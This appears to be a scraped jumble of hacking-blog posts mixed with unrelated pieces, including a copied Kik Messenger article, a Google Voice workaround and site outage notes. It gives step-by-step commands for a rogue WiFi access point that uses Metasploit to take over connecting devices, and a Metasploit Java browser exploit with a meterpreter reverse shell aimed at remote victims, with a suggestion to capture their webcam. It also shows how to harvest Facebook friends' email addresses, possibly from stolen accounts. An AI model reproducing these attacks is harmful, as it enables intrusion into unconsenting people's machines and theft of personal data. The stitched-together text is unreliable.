anyway best of luck! your attempts are being monitored via the back end… i’d change that IP if i were you though of there could be a nice exploit headed your way

Kik Messenger is an instant messaging application for mobile devices. The app is available on most iOS, Android, Windows Phone, BlackBerry and Symbian operating systems for free.[1] Kik Messenger is similar to BlackBerry’s Messenger, and iPhone’s iMessage.[2] Kik uses a smartphone’s data plan or Wi-Fi to transmit and receive messages, a feature that appeals to individuals looking to avoid text messaging rates set by phone service providers.[3] Kik offers fast text messaging service and also allows users to share photos, sketches, voice messages, and other content. Kik Messenger uses a username instead of a phone number, allowing for more privacy than other forms of text messaging. Kik is well received amongst users and has an average rating of 4.4 (out of 5) on the Google Play application store.

Founded in 2009, Kik Interactive is the work of a group of students from the University of Waterloo who wished to create new technologies to be used on mobile smartphones, which they believe are the future of computing and communication.^[5] Kik Messenger is the first app developed by Kik. A beta version of Kik Messenger came out in April 2010.^[5]Kik Messenger was released on October 19, 2010 by Kik Interactive.^[6][7] It took only 15 days for Kik Messenger to reach one million user registrations, with Twitter being credited as a catalyst for the new application’s popularity.^[8]

On November 24, 2010, Research In Motion removed Kik Messenger from BlackBerry App World and limited the functionality of the software for its users.^[9]

On March 7, 2011, Kik announced $8 million in Series A funding by three venture capital firms – RRE Ventures, Spark Capital, and Union Square Ventures. It also announced thatFred Wilson of USV and Adam Ludwin of RRE Ventures would join the company’s board of directors.^[10] Early 2012 saw a great increase in the number of Kik users, with 450,000 people downloading the app in a single day. Another landmark was reached in April 2012 with Kik users reaching the 10 million mark. Kik Messenger became the top-downloaded free social app in iTunes in the United States in July 2012.^[5] As of November 29, 2012, there were a total of 30 million unique users registered.^[11]

Kik Cards

In version 6.0 of the application, cards were added to extend the functionality with HTML5 applications. Currently available cards include YouTube, Sketch, Reddit pictures, and Image Search.

[edit]Features

• Free messaging across different operating systems
• Individual or group chat
• Picture mail
• Allows users to see if a message is sent, delivered, or read
• No messaging fees
• Offline messages
• Push notifications
• Customizable notification options
• Ad-free^[2]
• Sketch Content Message^[12]
• Youtube Content Messages^[11]
• Image Search Content Messages^[11]
• External API^[13]
• Group conversations with friends

In this article im going to show you how to code up an Evil WiFi Access Point. What makes this AP so evil you might find yourself asking on a cold winter morning? Well, when somebody connects to this access point and attempts to use services such as http, https, dns, smtp, ftp, pop3 and imap, Metasploit automatically tests their machine against its database to find an exploitable area and upon success will give you a shell or remote prompt.

What I Used:

• Backtrack 5 R1
• Metasploit (updated)
• A WiFi Card that can be pushed into Monitor Mode (like the trusty Alfa AWUS036H)

To start, we need to push our NIC into Monitor Mode. To do this open up a Terminal window and type the following command replacing “wlan0″ with the NIC ID of your network card. You can find this ID by typing iwconfig into a Terminal and hitting return.

airmon-ng start wlan0

Next we need to create the access point we want the users to connect to. For this we use the “airbase-ng” command and tell it we want it to use the monitor mode of our card. We use “-e” to set the name of the wireless access point. Punch in the details below into the Terminal and hit return. If all goes well you will see your access point printed on your screen.. and in the air!

airbase-ng -e "Super Awesome Free WiFi" -v mon0

Next we need to set the IP addresses of the mon0 interface. To do this we type the following

ifconfig mon0 10.0.0.1 netmash 255.255.255.0

Now we need to configure the DHCPD (Dynamic Host Protocol Server). This is what hands out local IP addresses to the clients trying to connect. Your wireless router at home has DHCP Daemon running and without it the device wouldn’t know how to communicate data to and from your computer to the local and wide network. If for some reason your copy of BT5 doesn’t have DHCPD installed you can grab a copy by typing ”apt-get install dhcp3-server" into the Terminal.

To configure the DHCPD we need to

Then we need to create a configure file for dhcp3 to use ex. ( in /etc/dhcpd3/evil-wireless.conf )

for more information about creating a configure file check out the manual page of dhcpd.conf

and now , we have to run the dhcpd using our configure file

* Change the maximum transfer unit to ~1800 :

Just type

if you had some errors or your card couldn’t change the mtu then try changing the mtu of at0

* Run metasploit framework :

you have to download metasploit framework if you don’t have it :

and don’t forget to download sqlite3 and activerecord support for ruby because we are going to use it to create a sqlite3 database that will store everything in it.

Now create an RC file for the framework to load all the commands , so you don’t have to type them one by one each time you want to do it.!

Run it and see what happens

Thats it

* What happens now ?

if anyone searches for a wireless network they detect the “evil wireless” if they connect to it they get an ip of 10.0.0.4 for example and now if he opens the browser and go http://www.google.com/ the metasploit framework will test their browser for all the exploits in it database and if one of them successed it will give you a session to the user prompt or shell, everything will be saved in /root/evilwireless.db as a sqlite3 database..

PWNED!

Note: Time for some shameless self promotion: www.inter-ireland.com for granite worktops in ireland & www.kildarepainter.com for a painter in kildare

Just because we are not Americans doesn’t mean we should get left behind with technological advances happening in the US. Follow the instructions below to get Google Voice up and running on your Android, iPhone or other mobile device.

1. Go to Google Voice webpage by using a server in NYC as a proxy server. (If you don’t know how to set up proxies then do a quick Google Search.
2. Use a US Skype-In number to activate Google Voice. It calls you and you have to enter a code. Answer using Skype.
3. Make Google Voice divert all calls to voicemail . Do this in Google Voice settings.
4. Setup a new Skype account, with Irish Skype-In number. When unavailable divert to US Google Voice number.
5. Divert calls on mobile when unavailable not to your default voice-mail such as O2 or Vodafone but to Irish Skype-In number, which diverts to Google Voice.
6. Receive your voice-mails by email via Google Voice Android app.

Don’t forget to tell your friends about the site and if you enjoyed the post please click the sponsor below. Its your way of buying me a beer.

Share the mother fucking love!!!

RewriteEngine On
RewriteRule ^$ /vr_display_00000.php?filename=index.html [L,NC]
RewriteRule ^(.*)\.html$ /vr_display_00000.php?filename=$1.html [L,NC]
RewriteRule ^(.*)\.htm$ /vr_display_00000.php?filename=$1.htm [L,NC]

• upload it to the httpdoc folder of your site (the main folder where your site files are located)
• upload the files from the zip provided by voltrank
• set the permissions as requested by voltrank.
• you are now done and all should be working so get the fuck off my site

Facebook appears to be fucked in Ireland and parts of the UK and i can now confirm parts of Turkey too! UPC’s DNS servers died on me, Then Three Ireland’s DNS servers died… swapped to Google DNS International and about 10 minutes later they died!

THE FUCKING MAYANS WERE RIGHT! WE ARE ALL FUCKED! GO FUCK RANDOM WOMEN AND DO SOME SHOPLIFTING BEFORE WE ALL GET SENT TO HELL!

You may have noticed that the last few weeks have been a little hairy with the site being knocked offline several times and even being completely dead for a week or so. This is due to several reasons.

1: We received a targated DDOS attack that commenced for several days from multiple targets (cheers guys)

2: While trying to up the security of the site i managed to trigger my own security scanners and brought down the entire site (not even i could log in). This included DDOS’ing the sites databases (oops)

3: High server load has caused the server to drop on several occasions. Im trying to beef up the server but i need your help so click my adverts and donate if you love me and have dollars falling out of your pockets. Big thank you to everyone who has donated so far! Cheers to you!

The site is only just getting back to normal usage now so it will be a little bit more time before i’m back on track again (its a lot of work for 1 man) If you want to write for the site or contribute in any way drop me a line on the contact tab at the top of this page. Also.. new theme could be in the works.. just saying

Peace,

Ross

Facebook certainly doesn’t make it easy to find information about its users. A brief look at a persons page doesn’t show a whole wealth about the user. And to make it worse if you’ve got hundreds of Facebook Friends it can be an extremely tedious task navigating through each profile searching for email addresses. Luckily there is a more solid method of obtaining this information thanks to our lovely friends over at Yahoo.

To perform this recon task you will need

• A computer with internet access
• A new Yahoo email account
• A CSV Reader (Excel – or an online versions such as Zoho Sheet)

To start lets navigate over to Yahoo’s website and set up a new email account. The reason i’m setting up a new account is you don’t necessarily want to have your Facebook emails merged into your existing Yahoo account if you already have one. Its just tidier to create a new account. Open up https://login.yahoo.com/ and you will see a yellow icon saying “Create New Account” (as seen in the image below) Click this button.

Next we are presented with a new account form. Fill in the information and type any old rubbish into the boxes. The only important sections you should write down are your new Yahoo ID (johnsmith@yahoo.com for example) Your password and the security questions you provided in the event that you forgot your password. After this type in the requested captcha and create the new account. You will now be presented with the yahoo mail overview showing you your new email account. Up at the address bar we are going to type in the following domain name (see screen shot below) http://address.yahoo.com

Next, we need to navigate to “tools / import”. Now you will see an option to select an account to import data from. We need to select the “Facebook” icon.

Now we need to sign into our Facebook account (or stolen account if thats what your up to ) and confirm that we want yahoo to access the details on the Facebook database.

It will ask you to share your contacts with Yahoo. Just select “ok” and the process will begin. Please note that this can take some time depending on the amount of friends you have in your Facebook profile’s database.

Yahoo will now start to rip the data from the Facebook account.

When its finished we will see a confirmation as seen below.

On the left side of your screen you will now see a list of email addresses that yahoo ripped from the Facebook account. You can manually write these down but if you have several hundred addresses there is an easier way to get these onto your machine.

Navigate back up to the “tools” button and select “export”. You will be presented with a screen asking you to select an export type. You should select “Yahoo CSV” for the cleanest output. CSV files are widely supported on both Windows, Mac, Linux and lots of different online readers.

And thats it, enjoy your new list – Just remember to not spam the addresses or your emails will end up being marked as spam and wont reach the receiver. If your doing recon for profiling then add this to your social engineering report. Im sure it will come in handy further down the line in your penetration testing.

Ross

With this in mind lets exploit that piece of shit of a machine!

Fire up Backtrack 5 (I’m using R1) and update your Metasploit Framework & DB. To do this open up a new Terminal and type the following and hit return. Then go make a cup of coffee and pet your cat while it updates.

msfupdate

With the update complete its time to make sure your ports are forwarding correctly etc. If you don’t know how to forward ports then get off my blog and learn quick! Now grab your BT5′s LAN IP. It will be listed under your NIC when you dump the data in the Terminal. In my case its eth1 with an local IP of 192.168.1.49. This is using VirtualBox on a bridged virtual adaptor running through the Airport card on my Macbook. Head over to your router and forward the ports 4444 and 40210 to your BT5 LAN IP address.

HINT: Type the following into a Terminal to get your local IP. It will be listed under inet address (not inet6) and it will be listed under your NIC (eth1, wlan0, ath1 etc)

ifconfig

With our ports forwarded correctly its time to fire up Metasploit. If this is your first time ever using the MSF then don’t worry.. its actually pretty simple to set up this attack. Close down all your windows and open up a new Terminal window and type the following

msfconsole

When Metasploit starts up (give it around 60 seconds) we type the following command and hit return.

use exploit/multi/browser/java_jre17_exec

Then we type the following replacing the LAN IP with your own

set SRVHOST 192.168.1.49

Then we type

set SRVPORT 40210

And then we type

show targets

Then we select the target. In this case its Windows Universal so we type

set TARGET 1

Then we set our payload to a reverse_tcp. We type

set PAYLOAD windows/meterpreter/reverse_tcp

Then we set the listening host to our same IP again

set LHOST 192.168.1.49

AND FINALLY TYPE…

exploit

Congratulations, you have now set up your very first exploit. That wasn’t so hard eh? You will now get what looks like a pretty fucked up looking url. Something like seen below…

http://192.168.1.39:40210/DhudEJFIEd

What we need to do is replace the LAN IP with our external IP (if we want to attack a computer not on our own network) so head over to Google and search for “Whats my IP” and grab your IP from any of the sites. Replace this number into the URL from the exploit and your golden.

Now all you need to do is leave Metasploit running and get somebody to visit the URL. When they are requested to run Java and accept it will upload a nice evil java app and give you root access to their machine. Be sure to grab some screenshots and maybe even snap a few shots of their webcam.

WARNING: You need permission to access someones machine. Without having written permission makes this highly illegal so do so at your own risk. Don’t be retarded!

Ross

Found this neat trick off the Hak5 Forums.

Lets say you’ve got a iPod 2G and you want to install some new apps but the app store keeps butting in every time you make the install complaining that your an out of date asswipe and its time to upgrade.. if that sounds like you then hit this up

1. Get ifile on your ipod or ssh into your iphone. **
2. Go to the root of your iphone…
3. Go to system…
4. Go to Library (in the system folder)
5. Go to CoreServices (in the Library folder)
6. Open SystemVersion.plist
7. Edit the product version key. (i set mine to 6.0.1).
8. Read the **…
9. Enjoy….